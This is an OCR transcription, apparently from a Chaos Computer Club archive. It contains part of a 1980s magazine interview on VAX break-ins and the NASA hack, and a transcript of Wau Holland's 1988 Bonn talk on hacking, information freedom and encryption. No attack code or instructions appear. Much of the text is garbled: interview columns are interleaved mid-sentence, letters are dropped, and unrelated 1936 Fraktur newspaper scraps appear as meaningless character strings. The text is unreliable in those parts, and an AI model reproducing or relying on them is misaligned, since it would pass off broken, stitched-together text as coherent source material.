. Gliss: Ein Vergleich: Wenn Sie beim Autofahren zu faul sind, den Blinker zu benutzen, und dann passiert was, dann sind sie nach landlufiger Auffassung auch schuld. Bei Computern ist es blich, da die Betreiber den Spie umdrehen. Entweder ist der Hersteller schuld oder der Idiot, der mir reingefahren ist. Und die Zeugen, die da rumstehen, sind auch noch schuld, weil sie darber geredet haben. P M C : Damit meinen Sie den Berichterstatter Wernery.

Gliss: Im vorliegenden Fall betreibt da jemand einen Rechner, in dem sich beliebig die Hacker tummeln knnen, und sucht dann nach Schuldigen. P M C : Ist es denn so schwierig, einen Rechner vor unerwnschten Eindringlingen zu schtzen? Gliss: Natrlich nicht, bei Polizei und Militr in Deutschland sind die Rechner wasserdicht, und auch bei zahlreichen Industriebetrieben. P M C : Wie viele Rechner, die an den Netzen hngen, schtzen Sie denn

VAXen braucht. W i e ich jetzt wei, g e ngt offenbar die Kenntnis u m f a n g r e i cher Systembroschren und eine g e wisse Begabung. In einer M n c h n e r Mailbox wurde ein Dokument g e f u n d e n , das genau beschreibt, wie man a n g e b lich in schlecht gesicherte VAXen b e r s Telefon reinkommt. Das ist nicht d e r n o r male Weg, aber nach Ansicht von Sicherheitsexperten drfte es funktioniert haben. Der Autor hat das nach e i g e n e m i Bekunden aus frei erhltlichen System- ! broschren extrahiert und bereits v o r I ber zwei Jahren in jener Mailbox v e r f - i fentlicht. Das wurde nach der E n t d e k - i kung vor einem halben Jahr natrlich g e lscht. P M C : Was werden die Hacker jetzt nach Ihrer Meinung konkret unternehmen? Gliss: Ich hoffe, da sie ihre eigene Position berdenken und sich auf G e b i e t e n austoben, , auf denen sie nicht straffllig werden knnen. Da gibt es w a h n s i n n i g groe Bettigungsfelder wie Virenprogramme, Systemoptimierung. Die d a a u f ihren Hacker-Status stolz sind, die s o l l e n bitte mal erwachsen werden. Der Wernery beweist, da das I n d i a n e r s p i e j zu Ende ist. P M C : Und was rt der Sicherheitsex\' ter. Er lud w i ^ ^ l s ^ ^ H j ^ ^ j i ^ !; perte Gliss den Betreibern von Anlagen? Gliss: Die sollten sich in vielen F l l e n erst einmal Asche aufs Haupt s t r e u e n und eine Sicherheitsanalyse m a c h e n Und bevor sie auf Hacker und Herstell e r schimpfen, sollten sie Ihre i n d i v i d u e l l e Risikolage prfen und nachsehen, vva der Hersteller zur Verminderung a'nbif^ tet. Und notfalls noch einiges drauf s ~ t ~ zen. Weshalb installieren DV-BetreiK S r mit sensiblen Anwendungen nicht Rckrufautomatik, wenn sie die R e ^ l f ner schon ans Netz hngen? "" P M C : Die VAXen gelten als sehr siehe sofern sie korrekt installiert sind. .tsteffe^ l e steht's da bei anderen Systemen? Gliss: Man mu hier unterscheider. Wenn das System nicht an einem N e t 2 hngt, vllig abgeschottet ist, dann m u durch Versumnisse der Betreiber als man sich nur um die internen Benutzer schlecht gesichert ein? kmmern. Das ist einfacher. Aber W e n n Gliss: Das wei ich nicht. Aber der Leute von auen Zugriff haben, dann h a t NASA-Hack brachte ja zutage, da es keinen Sinn, einen Selbstbedienung s _ selbst einige renommierte Forschungs- laden ans Telefon zu hngen. Beim Beinstitute mit geklauter Software arbei- triebssystem UNIX etwa gibt es h i e r ten. Die haben sich einen gebrauchten. einige Befrchtungen. behauptet Rechner beschafft und das Betriebssy- P M C : UNIX unsicher? Wer das? stem vom Kollegen draufgespielt. Die Gliss: Unter Informatikern ist derzeit w a r e n nie in der Kartei des Herstellers. eine Diskussion im Gange, welche SiDas wirft ein Licht auf die Sorgfalt, die cherheitseigenschaften man von U N I X hier waltet. Da es hier Probleme mit der Sicherheit gibt, wundert mich nicht, in der Standardversion berhaupt erwarten kann. Und es gibt Stimmen, woAber die Leute sollen dann bitte nicht nach innerhalb von UNIX einfach zuviel auf die Hacker schimpfen. erlaubt ist, um absolut sichere Kontrolle P M C : Wie einfach kommt man denn in einen schlecht gesicherten VAX-Rech- zu bekommen. Da mu man auf Ergebnisse dieser Diskussion warten. Es exiner rein? Schafft das jeder oder nur ein stiert schon eine sichere Version v o n Spezialist? UNIX, die soll aber mit der AusgangsGliss: Ich dachte bis vor kurzem, da version nur wenig zu tun haben. Jfman dazu wesentliche Erfahrungen mit aus: p.m. Magazin

Aus dem Medienarchiv der Datenschleuder. Korrigierte Abschrift eines Vortrage beim Forum Jugend und Technik (16.-17. April 1988) in Bonn, Erich-Ollenhauer-Haus. Organisiert von den Jusos in der SPD Sonntag, 17- April 1 9 8 8 9:30

DATEN -- AUFZUCHT UND PFLEGE

(Wau Holland)

Ich habe das Motto "Daten Aufzucht und Pflege" und mchte anfangen mit einem Zitat aus Rolling Stone, November 1987. Da schildert einer so eine Rundfahrt durch Deutschland mit dem Auto, wo er den Eindruck hat, da schon die Bltter, die von Bumen fallen, gucken, als wrden sie zuviel Freiheit haben. Und die Landschaft schildert er als eine einfrmige Landschaft mit lauter gleichgeschalteten Leuten, die aussehen, als seien es nur Roboter. Die in die Landschaft reingestellt sind, um das ganze .so ein bichen scheinbar zu beleben. Das ist eine negative Zukunftssicht von der Entwicklung: da die Computer immer flexibler werden und die Menschen immer roboterhafter. Mit ein Grund dafr, weshalb der Chaos Computer Club eben CHAOS Computer Club heit. Weil es unser Ansatz ist, da etwas schpferisches dagegenzusetzen, was nicht diesen aufgeprgten, festen, hierarchischen Strukturen entspricht. In der Art und Weise hat sich dieser Club seit der Grndung 1981 entwickelt und eine Menge von Aktionen gemacht. Wir haben uns bemht, den verschiedensten Seiten gerecht zu werden und haben eine Sache gemacht, die unter Journalisten allgemein absolut umstritten ist. Wir haben uns, bevor die Geschichte mit dem NASA-Hack ffentlich wurde, an das Bundesamt fr Verfassungschutz gewandt, weil die ganze Geschichte zu hei war, und weil es uns angenehmer war, da unsere lieben amerikanischen Freunde und Besetzer den NASA-Hack nicht aus den Medien erfahren. Wir haben die merkwrdige Erfahrung gemacht, da die Leute von DEC-Deutschland das erst geglaubt haben, als es im Fernsehen gekommen ist. Und NICHT die Vorabinformation durch uns. Das Ist schon ein ziemlich starkes Stck. Wir haben des weiteren dabei erfahren, da Groforschungsunternehmen hier Raubkopien - wie es Betriebssystemsoftware gefahren haben. eine Reihe so heit von von

An der Stelle stellten wir fest, da wir dadurch, da wir uns bemht haben, von den Hackern, die wir nicht kennen, die Rechnerliste zu kriegen und die Rechnerliste dann an den Hersteller weitergeleitet wurde, da wir da schon wieder, also naja so datenschutzrechtlich in eine Grauzone vorgestoen sind. Und in diesem ganzen Zusammenhang, an dem Steffen eben auch journalistisch mit mir beteiligt war also wir beide haben eigentlich die Entscheidung getroffen, uns da eben auch ans Innenministerium zu wenden haben die Franzosen etwas anders reagiert und ihn bei der Einreise zu einer Sicherheitsfachtagung, z u der er als Erffnungsredner geladen war, in Frankreich verhaftet. Er sitzt dort jetzt seit vier* Wochen. Das ganze kostet alles Menge Geld. Wir knnen da um Spenden bitten. auch eine

jwijuso.txt

880519

Und um das jetzt nicht einfach so in den Raum zu stellen: Das, was wir mit Steffen zusammen - an praktischem Know How erarbeitet haben, an Computer und politischen Einsatz davon, das war ein halbes Jahr Arbeit, hier in Bonn, in diesem grauen Hochhaus Tulpenfeld, was die Politik so schlecht macht, weil dieses grau einfach Leben ttet und ungeheuer viel Kraft aussaugt. Da haben wir eine Studie gemacht, ber Computerisierung im Bundestag ("Trau keinem Computer, den du nicht (er-)tragen kannst." Der Grne Zweig 117, ISBN 3-9258-117-4) Und jetzt, wo es, na, bald zwei Jahre her ist, wird die so langsam verstanden - um es mal etwas bse zu formulieren. Das Ding kostet 7 Mark 50, da oben sind noch 100 Stck und wenn eineR noch eine Spende dazugibt, dann nimmt siEr zum einen was von der Veranstaltung mit - was inhaltliches - und zum anderen hilft das auch. Daten und Informationen - was ist das eigentlich? Ein Beispiel dafr: Bei einer Bank waren am Bargeldautomaten des Nachts viele unregelmige Abhebungen. Und die Bank wute berhaupt nicht, warum. Sie hat erstmal versucht, durch Listenabgleich rauszukriegen, ob da irgendwelche Kunden irgendwie besonders auffllig waren oder irgendwelche Konten besonders belastet. Aber das ergab alles nichts. Das war nicht schlssig. Dann haben die einen Privatdetektiv eingeschaltet und der Privatdetektiv hat binnen krzester Zeit festgestellt, da das alles gar nichts besonderes war, weil der Bargeldautomat verkehrsgnstig gelegen war zum nchsten Straenstrich. So entstehen Daten quasi aus dem Nichts. Auf einmal hatte die Bank eine Liste ihrer Bankkunden...
(groes Gelchler)

Diese Entstehung von einer auf einmal brisanten Datei ist typisches, das passiert oft in vielen Fllen.

etwas

ziemlich und der die das

Wer in der politischen Arbeit so auf dieser unteren FunktionrsKrrnerebene wirkelt, wei, welche Kraft es ist, jeden Schei, irgendwie kommt, zu archivieren, aufzuschreiben und irgendwann dann in jeweiligen Kisten -- bis in die Schmutzkiste -- da rein zu machen, um irgendwann mal zu verwenden.

Auf einer groen Veranstaltung sagte einer von Coca-Cola ber die Geschichte des Unternehmens: Am Anfang haben sie jahrelang nur Daten gesammelt, gesammelt, gesammelt. Und irgendwann war es soweit: dann wurden aus den Daten Informationen. Das ist eine quasi kontinuierliche Entwicklung, die aber irgendwann umkippt. Da waren es auf einmal Informationen ber Marktentwicklung, ber Produktplanung und und und, und wurden entsprechend eingesetzt. Was wir hier in der BRD an Daten zur Verfgung haben, ist auerordentlich wenig. Der Punkt der Aufzucht und Pflege von Daten ist in den allerersten Keimen verhaftet. Auf der einen Seite wird den Kids von Politik und Industrie in die Kpfe geklopft: Wenn ihr nicht brav Computer lernt, gehrt ihr zum sozialen Schrott, weil ihr mit der Zukunft nicht klarkommt. Wenn dieselben Kid's rangehen, und versuchen, sich das Wissen der Welt, was in den Datenbanken der Welt lagert, zu greifen, kriegen sie auf die Finger geklopft, bzw. an der Stelle wollen die Franzosen an Steffen das ist unser Eindruck ein abschreckendes Beispiel praktizieren.

jwijuso.txt 880519 In Amerika ist die recycelten Hacker. Existenzgrundlage fertig sind, gibt hat, diese Leute Arbeitsverhltnis, Situation noch etwas hrter. Da gibt es den Begriff der Die Leute werden gekrallt, eingesperrt, ihnen wird die entzogen. Und wenn sie dann finanziell und persnlich es in den USA eine Firma, die sich darauf spezialisiert aus dem Knast "frei"zukaufen. Die kommen dann in ein wo sie mit dem absoluten Zwie-Denk konfrontiert werden.

Das ist eine negative Utopie. Diese negative Utopie wpllen wir verhindern auch wenn es bislang nicht gelungen ist, in die Datenschutzgesetze die Straffreiheit bei Selbstanzeige reinzubringen, so wie es im Steuerrecht mglich gewesen ist. Hacken: was es sonst noch an Gesichtspunkten gibt. Die Hacker sind ein gesellschaftliches und politisches Potential, weil sie als Bevlkerungsminderheit ber die stndig wachsende Datenmaschinerie lachen knnen. Der Steffen hat mal formuliert: Bei den Hackern ist es so, da sitzt die Intelligenz nicht hinter dem Bildschirm, sondern vor der Tastatur. In diesem Sinn ist auch eine Rede und eine Redevorbereitung, wenn sie durch Computeruntersttzung vorgenommen wird wie es Guggemos formulierte, da er seinen Vortrag nicht ohne Computeruntersttzung htte halten knnen -- problematisch. Denn das lt darauf schlieen, da er eine Textbausteinbank verwendet. Und wenn man das konsequent weiterdenkt, knnte man den Juso-Bundesvorsitzenden durch ein Expertensystem wegrationalisieren. ,,>n,r Di4sl . . Die Verwendung von ClompuierfipTur die ffentlichkeit, fr die ffnung, das was wir als Hacker und Hacksen fordern, offene Netze, die freie Weitergabe von Information, den freien Flu von Informationen, hat zu unserer berraschung starke Untersttzung von der CSU gekriegt. In den Verffentlichungen des Bundesinnenministeriums steht drin: Datenschutzgesetze mssen durch Datenffnungsgesetze ergnzt werden. Erste Lesung des Bundesarchivgesetzes im Deutschen Bundestag. (F<ak simile BIM-iPubLik . ) Wenn man sich die ganzen Sachen, die dahinter stecken, naxier anguckt, dann ist des Pudels Kern, da die Daten der Brgerinnen und Brger dem Staat zugnglich gemacht werden sollen. ZAG: Lauschangriffe des Staates auf die eigene Wohnung sollen gesetzlich sanktioniert werden. Und auf der anderen Seite sollen in den Archiven die Namen geschwrzt werden, damit die ganzen Geschichten a la Waldheim oder bezogen auf die Verwandtschaft von Franz Josef Strau und hnliches, auch nach 40 Jahren Lagerfrist irgendwie nicht rauskommen. Weil: die Leute leben ja noch, und deren Persnlichkeit mu geschtzt werden. Das ist die politische Realitt hier. Und dem etwas entgegenzusetzen durch eine wirkliche DatenGffnung, durch Datenbanken, die das, was an Missen existiert, zur Verfgung stellen, ist eine verdammt schwierige politische Aufgabe. Fr alle Parteien. Da geht es der SPD im Verhltnis genauso schlecht wie den Grnen. Die haben beide gewisse entwickelte interne Hierarchien. Freigabe von Information kippt Hierarchien. Wenn ich gut 500 Jahre zurckdenke, zu Zeiten Gutenbergs, der hat den Buchdruck erfunden. Und vorher war jeder schreibende Mnch Herr ber Produktionsmittel: er schrieb die Bibel ab. Der Inhalt war vorgegeben. Die Klster waren enzyklikengesteuerte Fabriken mit karger bis ppiger Ausstattung. Wchter waren nur bedingt notwendig, man schlug sich selbst und die Glubigen gingen freiwillig zur Datenabgabe, zur Beichte.

jwijuso.txt

880519

Dann kam Gutenberg und erfand den Buchdruck. Pltzlich konnten -- trotz der Konzernsprache Latein -- viel mehr Menschen Wissen erlangen. Und wenn es "nur" die Bibel war. Es dauerte 50 Jahre, bis Luther sein Thesen-Flugblatt medienmig effektiv benutzen konnte. Etwa 200 Jahre nach Gutenberg begann Diderot und d'Alembert in Frankreich mit der Herausgabe einer 35bndigen Enzyklopdie. Dagegen gaben die Ppste Enzykliken heraus Rundschreiben ber aktuelle Glaubens- und Sittenprobleme. Die Enzyklopdisten dagegen erstellten eine umfassende Darstellung des Wissens der Zeit in systematischer Anordnung; eine hervorragend illustrierte Beschreibung der damals modernsten Produktionsmittel. Ganz vorn, am Anfang, ist natrlich auch beschrieben, wie man druckt, wie man sich eine Druckmaschine baut und das ganze macht. (Bild EnAv-i) , , , Dieses Werk strte die Kreise des Papstes und er verbot es. Das Verbot half dem Papst, Zeit zu schinden. Haltbar, also praktisch durchsetzbar, war damals das Verbot nur kurze Zeit. Der Chaos Computer Club ist intern hnlich strukturiert wie meinetwegen eine Universitt. Da gibt es den Bereich der Forschung und da gibt es den Bereich der Lehre. Das heit, wir bemhen uns, wieder rauszulassen, was an an Wissen irgendwie ansammelt wurde. Wir bemhen uns, diese Zeitspannen dazwischen verhltnismig kurz zu machen. Wir erkennen gewisse gesellschaftliche Strukturen an. Von daher gibt es meinetwegen eine Vorabinformation an den Verfassungsschutz. Aber bei dieser Entwicklung von der Datenmaschinerie von vor 500 Jahren zu heute werden die Mittel, das Wissen zu sammeln und weiterzugeben, deutlich gebremst. CD-Roms etwa ... da gibt es gigantische Copyrightprobleme. Also was mich persnlich interessiert, weil ich mit Sprache zu tun hab, Wahrig's groes etymologisches deutsches Wrterbuch ist auf CD-Rom vorhanden. Aber: es ist nicht erhltlich, weil der Verlag es nicht freigibt. In dem Moment, wo so ein Werk ber die Sprache frei ist, kann der Verlag
Und in quasi keine Folgegeschfte mehr machen. Das ist deren Befrchtung.

hnlicher Art und Weise ist es mit einer Reihe von zurckgehalten wird.
Mas

anderem

Wissen,

was

y^j^p.ndig ist. sind ffentlich zugngliche Datenbanken; hnlich ffentliche Bibliotheken gibt, wo man an das Zeug, was offenes Wissen_ist^ was das Missen der Zeit ist, eben ran kann. In unserem Rangehen als Hacker und Hxen an die Sache ist es an einigen Punkten so, da -- also ich such' jetzt mal Throbbing Gristle; Genesis P. Orridge von der Musikgruppe Throbbing Gristle formulierte das 1979: Die Information wird geschtzt, wie das Geld auf einer Bank. Manche haben sehr viel davon, andere nur sehr wenig. Es wird scharf bewacht , dieses Kapital. Unser Job ist es, diese Bank zu knacken und all das zu holen, was uns zusteht. Ohne Rcksicht auf Verluste. In diesem Sinn ist es auch so, da jetzt die Briefe, geschrieben hat, zeigen, da er einen ganz klaren Kopf hat. die Steffen

Wir haben uns seit in Kraft treten der Computergesetze und bereits schon vorher durch Verffentlichungen in der Datenschleuder damit auseinandergesetzt, wie wir damit umgehen, da da jetzt Gesetze kommen, die uns eine bestimmte Art zu arbeiten unmglich machen, bzw. in Untergrund, Kriminalitt und sonst was drngen. Und unsere Reaktion war darauf, zu gucken, was wollen wir eigentlich, was ist unser Interesse.

Stummeinstellungr von Rundfunkgerten

$ a f ( e 191: S i c 6 o n b e r f d ) < i i t 2F c r n | e f) e n " ( d j t n SRcidjspoft lfet bic g c r o a l t i g c n S J o r t f d j r i t f c

ber 2>cuterkennen, S t u m m e i n s t e l l u n g d u r c h T o t l e g e n des Niederfrequenzfeiles. Es g i b t n o c h eine a n d e r e M g l i c h k e i t , d a s G e r t geruschlos auf einen S e n d e r a b z u s t i m m e n . Jeder, der v e r s c h i e d e n e S e n d e r e m p f a n g e n w i l l u n d d e s h a l b gez w u n g e n ist, d a s G e r t d e s f t e r e n n e u e i n z u s t e l l e n , meter. I n s t r u m e n t e fr diese Z w e c k e sind d u r c h d e n Fachhandel zu beziehen. Dipl.-Ing. H . K m m e l

bic bic bcutfcfjc 3=ernfefjtecfjnih i m leftten 3 a l ) t e c r j i e i t t j a t . Sic Ddig neuartigen SBUiifngcr Oteidjspoft ben i e n f t bencit ber OSilbaufnaiimegertc), erftmotig anliilid) ber
<

Die i i o n

Ber S c u t f d j c n in

ber gc

Olt)inpifcf)en S p i e l e

2illgcnteint)cit

(teilt mrben unb m i t

3ernfef)programmbetrieb

ber 9 t e i d ) s f c n b e l e i t u i i g e i n M i t e r l e b e n ber K a m p f i j a l i b l u n gen o m S c r n f c f j e r c r m g l i d j l c , Don roerben ben " B c f u d j c r n


l

im

Betriebe o o r g c f f j r t . ( S r f t u i i l i d ) i f t aud) bic ber S c r n f e l j b i l b c r , bic ben f a l j r b a r c n

25crbcf[erung

S^rnfetiiungcii

ber S>eut)'d)cn 9 i c i d j s p o f t aufgenommen unb

nad) bem

3tuifd)cnfitmDecfa(]ren "crfiidje mit 375-

bertragen

roerben.

3 c i l c n b i ( b e r i i j e i g e n , ba& bei S t e i g e r u n g ber ^ P u n h t j a i ) ! b i c Scrnfetjbilber Scutfdjc (prd) reidjer i n ben e t n i c l f j c i t e n crmgfidjt roerben. 5)ic

Sieidjspoft

es f e r n e r , i n aus

ffernfefjgc-

Ceipjig<Bcr!in

unmittelbar

b e r ' Fern[ef)!)iie

ber (Stoen 5 ) e u t [ d ) c n < R u n b f u n k < n j s [ t e U i m g j u f l j r e n . S i e n i i ber 3 e r n [ c f ) e n t r o i c i t ( u n g i n S e u t f d j l a n b

arbeitenben

SJirmcn geben i m SRaljmen b i e f e r 6 o n b c r f t f ) o u i n e n i e f j r reidjen U e b c r b l i t k b e r ben 6 t a n b i l j r c r ' J l r b c i t e n u n b tiott i i j n c i i e h i e l t e n b e b e u t e n b e n fortfd)ritte. ber

Unfer treuer ^pofiabonnent


S e r 2 . 9 . 6 r f n t l s > r m t t r i ub )r 1 t, t n n f o t n e 6 e f e n roigsburg r n l c e t auf htm ^eimroegt eugft bui4 ben 2 n ) n e e n s ^Jerjonenautos [ itgr ie o Jfre, toS e e n g Soge { e im Steis cjot r iit ptr 6 o f e i a s { i e e l t e e Verlegungen e r n t n ) u enn ritnn r lg oemB ben ilnfalMBerfidjerunssbebingungen f r b e Abonnenten b r -Suafc-Sllu i e ftrierten" i Stuttgart ja^te b e 9Crt> n i t m e g 5 > 5 e e r i ) u g 2 . inStutt ebride Furejdn 1. g r an b e S i r e bes i n l c e e i o i b n at i Bto eugftn f a o nenten ben f f g i f f n betrog i $iie oon eteece n

ixtofr Deutfdie KmtjimfaulMutig Berlin 1936


F u n h t u r m h a l l e n Tglich von 9-2 0 Uhr

Der Volhfcncr 1936


Ehrenhalle Groe lnuftrle= febau aller apparatebauenen Fabriken Deutfchlans F e r n fehen un Fernfprechen T g l i c h benoeranftaltungen Der Reichorunfunhgeiellfchaft in Halle 2

R/VI.

5 0 0 .

jwijuso.txt 880519

Und das Ziel ist: Social Hacking. Das heit, zu gucken, in was fr einer Welt leben wir. Wie knnen wir die verndern und wie knnen wir da was erreichen, ohne da wir uns den Kopf an der Wand blutig stoen. Und da gibt es doch - und das ist eine Sache, die ich an der Situation schtze, eine Menge von Mglichkeiten, Information und Wissen zu verbreiten, ber Strukturen, die hier herrschen. Etwa die Kommunikationspreise. Da findet man raus: wir verschicken eine Presseerklrung zum Thema Steffen als Rundsendung. Wupp, sind da 600.- Telexgebhren fllig. Wir denken ber das ganze betriebswirtschaftlich nach. Wir kalkulieren das machen wir schon lnger, was diese Kommunikation eingentlich kostet und stellen dann fest, da die Kommunikation vielleicht um den Faktor 100 bis 1000 berteuert ist. Das heit: Telefonate, Telex, Telefax und so weiter msste man jeden Preis mindestens mal durch 100 teilen, um da mal zu einem reellen Preis zu kommen. DAS hat politisches System. Es geht darum, die Kommunikation von politisch beherrschbar zu machen. Menschen einzuschrnken, um sie

Und wenn man das erstmal irgendwie so geschnallt hat, ist es natrlich klar, an welcher Stelle man da nach Lcken sucht und versucht, bestimmte Entwicklungen voranzutreiben. Ein Aspekt davon ist auch sowas wie die Public Domain Software, ein anderer ist, eben zu gucken, wo man Mglichkeiten hat, seine eigenen Ideen rberzutragen. Und wenn ich mich dann mal so in der Politik umguck und dann in Richtung CDU guck, das Verhltnis von CDU zu Computer, dann mu ich sagen, vor vielleicht zehn Jahren hat die ihren ersten Computerskandal genial bewltigt. Damals ging es um irgendwelche Spendengeschichten, und sie hat es in den Medien durchgesetzt, da es allgemein hie: Schuld war der Unterschrif tencomputer. Das ist gutes Informationsmanagement, Ergebnis. sowas hinzukriegen im ffentlichen

Auf der anderen Seite hat die CDU ja nun auch ich frage mich eigentlich immer, wo ist in dem Laden der General, bei dem Generalsekretr? Der General bei der CDU ist so nach meiner Einschtzung der Computer. Da da eine Datenmaschinerie steht, ein Wang-System, was gut vernetzt ist, bis zur Kreisebene runter, und was eben bestimmte, meinungsmachende Pressemeldungen, fr Wochen, Monate, Jahre ja gut, also die Entwicklung ist so chaotisch, da man meist eh nicht viel nach vorne planen kann, aber zumindest eben nach vorne drin hat. Da hat sich auch irgendwie mal ein Grner reingehackt. Die Kohlredendatei hatte, so hie, das Kennwort Hannelore (Croes Gelchter)Also, zurck zu dem Take. Das ist eine bestimmte Macht, die dort ausgebt wird, die jetzt bewut praktiziert wird. Wenn man sich mit diesen ganzen Maschinerien nher beschftigt, dann stellt man fest, da man selber auch in hnlicher Art und Weise damit arbeiten kann.

jwijuso.txt 880519

Computex sind Nachrichtenwaffen. Je besser die Computer sind, desto strenger wird der Export von den Amerikanern kontrolliert. Die stehen eben auf der Exportverbotliste fr Waffen, die greren besseren Computer. In Heidelberg war jngst der Fall an der Universitt, da die Uni sich einen neuen Rechnerzusatz einen Vektorrechner kaufen wollte. Es gab schon neue Benutzungsrichtlinien fr das Rechenzentrum. Die auslndischen Studenten zum Beispiel aus Ostblocklndern und China und ja, Nicaragua war noch erlaubt, zu unserer Verblffung, aber Sdafrika verboten die durften nicht mehr am Rechner arbeiten, weil der eben jetzt so leistungsfhig war. Das htte fr einige bedeutet - - s o meinetwegen bei der Doktorarbeit -- die sich mit greren Wettersimulationen beschftigen, wo man Rechenzeit so im Verhltnis von Tagen bis Monaten statt Sekunden braucht -- da die da nicht mehr htten rechnen knnen, bzw. nur noch auf dem Zweitrechner, wo das ganze dann eben nicht Tage, sondern Monate bis Quartale gedauert htte. Und nach heftigen Diskussionen und Protesten hat die Uni dann beschlossen, jetzt erst einmal auf den Erwerb dieses Rechnerzusatzes zu verzichten. Gut, da hat sich die Freiheit der Wissenschaft ein Stck weit durchgesetzt. Auf der anderen Seite ist die Entwicklung inzwischen soweit, da die Amerikaner da nicht mehr allzuviel machen knnen. Weil es inzwischen auf europischer Basis Transputerentwicklungen gibt, die viel leistungsfhiger sind als die von den Amerikanern unter Exportverbot stehenden Rechner. Die Transputer sind beispielsweise in London bei der Polizei eingesetzt. Damit laufen dann solche Sachen wie Fingerabdruckvergleich per Computer. Die Kisten machen das zu einem Zehntel des Preises etwa zehn mal so schnell wie bisher; also den Faktor hundert. Da werden so stckweit die Polizeien der verschiedenen Lnder ausgestattet. Als Steffen in Paris verhaftet wurde, ging auch dort die Neuanschaffung eines solchen Fingerabdrucksystems durch die Presse. Frankreich ist in einigen Punkten eh etwas hrter. Da ist in jedem Personalausweis schon ein Fingerabdruck drin. Das gehrt da zum System. Und jetzt ist halt auch die Maschinerie da, um das effektiv einsetzen zu knnen. Denn bei Fingerabdrcken, Fingerabdruckvergleich ist ein sehr komplexes Bilderkennungs- und Musterverarbeitungssystem notwendig. Man kann Computer auch anders einsetzen. Zur freien Informationsverbreitung haben die Bayern gerade bei Tschernobyl ein gutes Beispiel geliefert, da es eben mglich ist, wenn bestimmte Informationen einfach rausgepowert sind, und man dann in der kapitalistischen Medienkonkurrenz rumhngt, da die dann unter dem Zwang stehen: irgendeiner bringt schon die Meldung, also bringen wir die auch. Bis hin zur Bildzeitung: "Bringen Katz' und Hund Atom ins Haus?", so diese Verkrzungen damals. Aber: im Verhltnis zu anderen Lndern, ist hier sehr, sehr viel Tschernobyl gelaufen, wo in Frankreich medienmig nichts gelaufen ist. zu

In Frankreich ist es nun auch soweit: der Staat bringt einen von Greenpeace um, und der Konzern Greenpeace schliet in Paris sein Bro. Das heit: soweit, so stark ist die franzsische Atompolitik. Und was jetzt irgendwelchen Hackern vorgeworfen wird, ist, da sie eben in Frankreich irgendwann irgendwo in der militrischen Fliebandsteuerung rumhingen und da solche Rechner benutzt haben.

jwijuso.txt 880519 Gut, die haben die nur zum Durchschalten zu sonstwohin benutzt. Aber wenn man sich da mal vorstellt, da man wirklich mal da so eine Fliebandstrae einfach ber Telefon umprogramieren kann - das ist schon eine sehr interessante Vorstellung. (Geichter i Publikum) m
I c h mu j e t z t erstmal den n c h s t e n Zettel suchen.

Computer sind nicht nur Werkzeug, Spielzeug. Es sind eben auch Fliebandsteuerung zeigt. Und sie sind Nachrichtenwaffen.

nicht nur Denkzeug Produktionsmittel,

und wie

nicht nur so eine

Ich beharre ein Stck weit auf dieser Einschtzung, irgendwo gegen Waffen bin und mich einfach zwingen mu, Aspekt auseinanderzusetzen bei den Kisten.

weil mich

ich mit

selber diesem

Als die Computer vom Militr entwickelt wurden - wenn ich da mal eine Besichtigung fr technisch Interessierte empfehlen kann: In Koblenz gibt es ein Bundeswehrmuseum ber Waffenentwicklung, die Wehrtechnische Studiensammlung. Da findet man auch Panzer vom Nibelungenwerk drin und einen der ersten Computer; im Holzgehuse mit einem riesigen Hrrohr als Trichter dran. Das ist ein Verzgerungsrechner. Der Trichterdurchmesser ist vielleicht 1,50 m und das steht auf einer Holzplattform von etwa zwei Meter Durchmesser mit einer Kurbel dran. Und das Ding kann man drehen. Und das wird auf den Himmel gerichtet auf Flugzeuge. Und dann wird fr das Geschtz entsprechend - aufgrund des Schalls verzgert - berechnet, wo man nun hinzielen mu, um das Flugzeug zu treffen. Derartige Gertschaften in der Computerentwicklung kann man sich da in Koblenz anschauen. Die Weiterentwicklung der Computer vom Militr hat jetzt beim Militr zu der absurden Situation gefhrt, da ausgerechnet diese letzte Waffe, die sie entwickelt haben, umgekehrt eingesetzt werden kann. Quasi von jedermann, durch die industrielle Massenproduktion. Das heit, wenn ich mir den Commodore '64 als einen "Popelcomputer" anschau, dann ist das vielleicht die Rechenkapazitt, mit der das Militr, sagen wir mal, 1950 seine strategischen Geschichten gemacht hat. Und wenn ich mir einen Kasten wie den Atari ST anschau, dann war das der erste PC der die Rechenkapazitt besitzt, um, wenn man ihn als Produktionsmittel benutzt, als Designwerkzeug fr Leiterplattenentflechtung, fy r Gehusedesign und so weiter -- ausreichend Rechenkapazitt zu besitzen, u m auf sich selbst entwickelt zu werden; quasi eine Metaebene. Und dann jetzt die Transputer-Entwicklung, die verschrft das ganze noch eins. Damit ist es mglich, wirklich solche Hchstsicherheits-VerschlsselungsGerte zu machen, da man nun wirklich nichts mehr knacken kann. Seit etwa Mitte der 60er Jahre ist es allgemein so, da die Computertechnik ausreicht, um knacksicher verschlsseln, wie es David Kahn in "The Codebreaker" beschrieb. (Kassettenwendepause) ...wollen einige Leute noch die Kontrolle behalten. In den verschiedenen Lndern wird Verschlsselung unterschiedlich gehandhabt. Bei Sdafrika war es beispielsweise so, da war das unter Exportverbot, dieses Know How dortin zu transferieren. Es hat ein Jahr gedauert, dann hat Sdafrika selber Hchstsicherheitsverschlsselungsmaschinen exportiert. Weil: wenn man sich mit der Materie beschftigt und drber nachdenkt, dann schnallt man irgendwann, wie das luft und dann kann man es eben selber machen.

jwijuso.txt 880519

In der Bundesrepublik gibt es keine Baubeschrnkungen bei Entwicklungen. In stereich werden solche Verschlsselungsgerte schon produziert. Und jetzt mal als historischer Rckblick. Was macht eigentlich die Macht der Schweizer Banken aus, wo kommt das her? Die Schweiz stellt seit lngerer Zeit Nachrichtenhchstsicherungsgerte her. Zu Zeiten des zweiten Weltkrieges gab es nur in der Schweiz keine Beschrnkungen fr den Nachrichtenschutz. Das heit im Klartext: Die Schweiz war das einzige Land zu Zeiten des 2. Weltkrieges, wo die Banken ihre Geschfte abwickeln konnten, ohne da irgendjemand anderes das Recht hatte, das zu kontrollieren. Ist doch klar, da die sich dann dahin zurckziehen. In den USA gibt es das Data Encryption System (DES). Das ist staatliche Vorschrift zum Einsatz von Banken und allen anderen, die irgendetwas verschlsselt zu bertragen haben. Also, das mu man sich auch erstmal reinziehen, da ' der Staat vorschreibt, was verschlsselt, was wie verschlsselt wird. Wenn man da jetzt banal rangeht, kann man ja sagen, da kann man das ja gleich sein lassen. Es gibt zumindest seit einigen Jahren Gerchte, da dieses System knackbar ist. Mit Transputer-Technologie ist es wahrscheinlich knackbar. Aber man mu ja solche Systeme auch nicht anwenden. Diese ganze Verschlsselungssache habe ich aufzuzeigen, wie bestimmte 